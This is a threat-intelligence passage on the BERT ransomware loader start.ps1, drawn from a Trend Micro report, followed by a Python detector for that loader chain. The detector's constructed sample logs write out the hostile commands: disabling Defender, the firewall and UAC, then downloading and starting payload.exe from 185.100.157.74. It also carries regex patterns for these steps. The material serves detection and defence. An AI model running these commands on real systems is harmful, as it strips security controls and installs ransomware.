Activity observed in the wild – TODAY
BERT ransomware payload (payload.exe).
During our pivoting efforts, we identified additional samples uploaded in the wild. Analysis revealed that these samples are older versions, lacking the updated encryption methods and function sequences seen in samples from our internal telemetry. These differences indicate that the threat actors are actively developing and refining the ransomware.
Over the course of our investigation, we found a PowerShell script (start.ps1) that functions as a loader for the BERT ransomware payload (payload.exe). The script escalates privileges, disables Windows Defender, the firewall, and user account control (UAC), then downloads and executes the ransomware from the remote IP address 185[.]100[.]157[.]74. The exact initial access method remains unclear.
Interestingly, the mentioned IP address is associated with ASN 39134, which is registered in Russia. While this alone does not establish attribution, the use of Russian infrastructure may indicate a potential connection to threat actors operating in or associated with the region. Notably, start.ps1 acts as the initial execution point for the ransomware.
Source: trendmicro.com, "BERT Ransomware Group Targets Asia and Europe on Multiple Platforms". BERT is a newly emerged ransomware group that pairs simple code with effective execution—carrying out attacks across Europe and Asia. In this entry, we examine the group’s tactics, how their variants have evolved, and the tools they use to get …
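Detection logic for the loader chain described above (security tooling disabled, then download and execution), added here as an example; it is not code from the post or from Trend Micro. It runs over constructed log lines shaped like PowerShell Script Block Logging (Event ID 4104) events; the line format, host names and timestamps are assumptions, and only the download host IP is taken from the report.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines shaped like PowerShell ScriptBlock logging (Event ID 4104);
# not a real capture. host01 mirrors the chain described for start.ps1, host02 tampers only.
SAMPLE_LOG = """\
2025-01-01T10:00:01Z host01 4104 Set-MpPreference -DisableRealtimeMonitoring $true
2025-01-01T10:00:02Z host01 4104 netsh advfirewall set allprofiles state off
2025-01-01T10:00:03Z host01 4104 Set-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name EnableLUA -Value 0
2025-01-01T10:00:04Z host01 4104 Invoke-WebRequest -Uri http://185.100.157.74/payload.exe -OutFile C:\\Users\\Public\\payload.exe
2025-01-01T10:00:05Z host01 4104 Start-Process C:\\Users\\Public\\payload.exe
2025-01-01T10:05:00Z host02 4104 Set-MpPreference -DisableRealtimeMonitoring $true
"""
WATCHLIST_IPS = {"185.100.157.74"}  # download host named in the report above
# One tag alone is noisy admin activity; the chained sequence within a window is the signal.
PATTERNS = {
    "defender_tamper": re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    "firewall_off": re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
    "uac_off": re.compile(r"EnableLUA\b.*\b0\b", re.I),
    "download": re.compile(r"Invoke-WebRequest|DownloadFile|Start-BitsTransfer|\biwr\b", re.I),
    "execute": re.compile(r"Start-Process", re.I),
}
TAMPER = {"defender_tamper", "firewall_off", "uac_off"}
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d+)\s+(.*)$")  # assumed: timestamp host eventid script

def classify(script: str) -> set:
    """Return the behaviour tags a single script block matches."""
    tags = {tag for tag, rx in PATTERNS.items() if rx.search(script)}
    if any(ip in script for ip in WATCHLIST_IPS):
        tags.add("watchlist_ip")
    return tags

def detect(log_text: str, window_seconds: int = 300) -> dict:
    """Flag hosts whose window holds tampering plus a download and an execution."""
    events = defaultdict(list)  # host -> [(timestamp, tags)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(3) != "4104":
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        if tags := classify(m.group(4)):
            events[m.group(2)].append((ts, tags))
    alerts = {}
    for host, evs in events.items():
        for start, _ in sorted(evs):  # slide the window from each tagged event
            seen = set().union(*(t for ts, t in evs if 0 <= (ts - start).total_seconds() <= window_seconds))
            if seen & TAMPER and {"download", "execute"} <= seen:
                alerts[host] = sorted(seen)
                break
    return alerts
```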